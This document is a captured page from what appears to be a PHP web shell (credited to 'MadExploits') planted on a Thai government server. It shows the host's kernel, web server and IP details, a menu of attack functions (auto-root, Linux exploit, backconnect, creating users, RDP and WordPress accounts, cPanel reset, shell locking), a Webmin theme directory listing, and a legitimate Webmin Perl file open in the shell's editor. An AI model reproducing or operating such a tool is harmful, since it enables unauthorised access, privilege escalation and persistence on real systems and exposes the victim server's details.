Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
authentic-theme /
[ HOME SHELL ]
Name
Size
Permission
Action
extensions
[ DIR ]
drwxr-xr-x
help
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
unauthenticated
[ DIR ]
drwxr-xr-x
401.cgi
368
B
-rwxr-xr-x
403.cgi
368
B
-rwxr-xr-x
404.cgi
368
B
-rwxr-xr-x
CHANGELOG.md
42.47
KB
-rw-r--r--
FUNDING.yml
98
B
-rw-r--r--
LICENSE
1.04
KB
-rw-r--r--
THEME.pgp
3
KB
-rw-r--r--
authentic-funcs.pl
14.46
KB
-rw-r--r--
authentic-init.pl
55.65
KB
-rw-r--r--
authentic-lib.pl
160.83
KB
-rw-r--r--
authentic.pl
43.86
KB
-rw-r--r--
buttons.pl
6.97
KB
-rw-r--r--
config
129
B
-rw-r--r--
index.cgi
334
B
-rwxr-xr-x
navigation.pl
8.67
KB
-rw-r--r--
pam_login.cgi
6.22
KB
-rwxr-xr-x
password_form.cgi
3.85
KB
-rwxr-xr-x
session_login.cgi
6.67
KB
-rwxr-xr-x
settings-backgrounds.cgi
3.65
KB
-rwxr-xr-x
settings-backgrounds_save.cgi
1.17
KB
-rwxr-xr-x
settings-editor_favorites_read...
923
B
-rwxr-xr-x
settings-editor_favorites_writ...
704
B
-rwxr-xr-x
settings-editor_read.cgi
2.55
KB
-rwxr-xr-x
settings-editor_write.cgi
848
B
-rwxr-xr-x
settings-favorites_save.cgi
663
B
-rwxr-xr-x
settings-logos.cgi
4.65
KB
-rwxr-xr-x
settings-logos_save.cgi
1.76
KB
-rwxr-xr-x
settings-user.cgi
7.32
KB
-rwxr-xr-x
settings.pl
735
B
-rw-r--r--
stats.cgi
8.84
KB
-rwxr-xr-x
sysinfo.cgi
5.94
KB
-rwxr-xr-x
theme-update.sh
7.3
KB
-rwxr-xr-x
theme.info
224
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : settings-editor_write.cgi
#!/usr/bin/perl # # Authentic Theme (https://github.com/authentic-theme/authentic-theme) # Copyright Ilia Rostovtsev <programming@rostovtsev.io> # Licensed under MIT (https://github.com/authentic-theme/authentic-theme/blob/master/LICENSE) # use strict; use File::Basename; our (%in, %gconfig, %theme_text, $has_usermin); do(dirname(__FILE__) . "/authentic-lib.pl"); !foreign_available("webmin") && error($theme_text{'theme_error_access_not_root'}); theme_config_dir_available(); my $file = html_escape($in{'file'}); unlink_file($file); write_file_contents($file, $in{'data'}); if ($has_usermin) { (my $_file = $file) =~ s/webmin/usermin/; unlink_file($_file); write_file_contents($_file, $in{'data'}); } if ($ENV{'HTTP_X_PJAX'} eq "true") { redirect($gconfig{'webprefix'} . "/webmin/edit_themes.cgi"); } else { head(); }
Close